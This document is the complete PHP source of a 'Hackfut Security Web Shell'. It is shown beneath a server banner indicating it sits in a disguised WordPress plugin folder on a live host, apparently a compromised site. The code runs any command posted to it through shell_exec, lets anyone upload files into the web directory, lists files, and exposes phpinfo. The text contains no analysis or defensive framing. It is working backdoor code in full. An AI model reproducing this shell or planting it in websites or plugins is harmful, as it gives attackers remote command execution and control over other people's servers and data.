|
Server : LiteSpeed System : Linux srv104790275 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64 User : dewac4139 ( 1077) PHP Version : 8.0.30 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /proc/thread-self/cwd/wp-content/plugins/wp_helper_0i3q5/ |
Upload File : |
<?php
/* ⚡ Hackfut Security Web Shell ⚡ */
error_reporting(0);
@ini_set('display_errors', 0);
echo '<!DOCTYPE html><html><head><title>⚡ Hackfut Security Web Shell</title>';
echo '<style>body{background:#0a0a12;color:#00ffea;font-family:Consolas,monospace;padding:20px;}';
echo 'pre{background:#1a1a2a;padding:10px;border-radius:5px;}';
echo 'input,textarea,select{background:#1a1a2a;color:#00ffea;border:1px solid #00ffea;padding:5px;margin:5px;}';
echo 'button{background:#ff00ff;color:#0a0a12;border:none;padding:8px 15px;cursor:pointer;font-weight:bold;}';
echo '.success{color:#00ff00;}.error{color:#ff0066;}.warning{color:#ffcc00;}';
echo '</style></head><body>';
echo '<h1>⚡ Hackfut Security Web Shell</h1>';
echo '<div style="background:#1a1a2a;padding:15px;border-radius:5px;margin-bottom:20px;">';
echo '<pre>'.php_uname().'</pre>';
echo '<p>📂 '.getcwd().'</p>';
echo '<p>🐘 PHP '.phpversion().'</p>';
echo '</div>';
// Command execution
echo '<div style="margin-bottom:20px;">';
echo '<h2>⚡ Command Execution</h2>';
echo '<form method="post">';
echo '<input type="text" name="cmd" style="width:70%" placeholder="Enter command">';
echo '<button type="submit">🚀 Execute</button>';
echo '</form>';
if(isset($_POST['cmd'])){
echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;">';
echo '<pre>'.shell_exec($_POST['cmd']).'</pre>';
echo '</div>';
}
echo '</div>';
// File upload
echo '<div style="margin-bottom:20px;">';
echo '<h2>📤 File Upload</h2>';
echo '<form method="post" enctype="multipart/form-data">';
echo '<input type="file" name="f">';
echo '<button type="submit">📤 Upload</button>';
echo '</form>';
if(isset($_FILES['f']) && $_FILES['f']['name']){
$target = basename($_FILES['f']['name']);
if(move_uploaded_file($_FILES['f']['tmp_name'], $target)){
echo '<p class="success">✅ Upload successful: <a href="'.$target.'" style="color:#00ffea;">'.$target.'</a></p>';
}else{
echo '<p class="error">❌ Upload failed</p>';
}
}
echo '</div>';
// File manager
echo '<div style="margin-bottom:20px;">';
echo '<h2>📁 File Manager</h2>';
echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;max-height:300px;overflow:auto;">';
$files = scandir('.');
foreach($files as $file){
if($file == '.' || $file == '..') continue;
$color = is_dir($file) ? "#ff00ff" : "#00ffea";
$size = is_dir($file) ? "DIR" : filesize($file)." bytes";
echo '<div style="padding:3px;"><span style="color:'.$color.';">'.$file.'</span> - '.$size.'</div>';
}
echo '</div>';
echo '</div>';
// PHP info
echo '<div>';
echo '<h2>🐘 PHP Information</h2>';
echo '<form method="post">';
echo '<button type="submit" name="phpinfo">📊 Show PHP Info</button>';
echo '</form>';
if(isset($_POST['phpinfo'])){
ob_start();
phpinfo();
$phpinfo = ob_get_contents();
ob_end_clean();
echo '<div style="background:#1a1a2a;padding:10px;border-radius:5px;margin-top:10px;overflow:auto;max-height:400px;">';
echo $phpinfo;
echo '</div>';
}
echo '</div>';
echo '</body></html>';
?>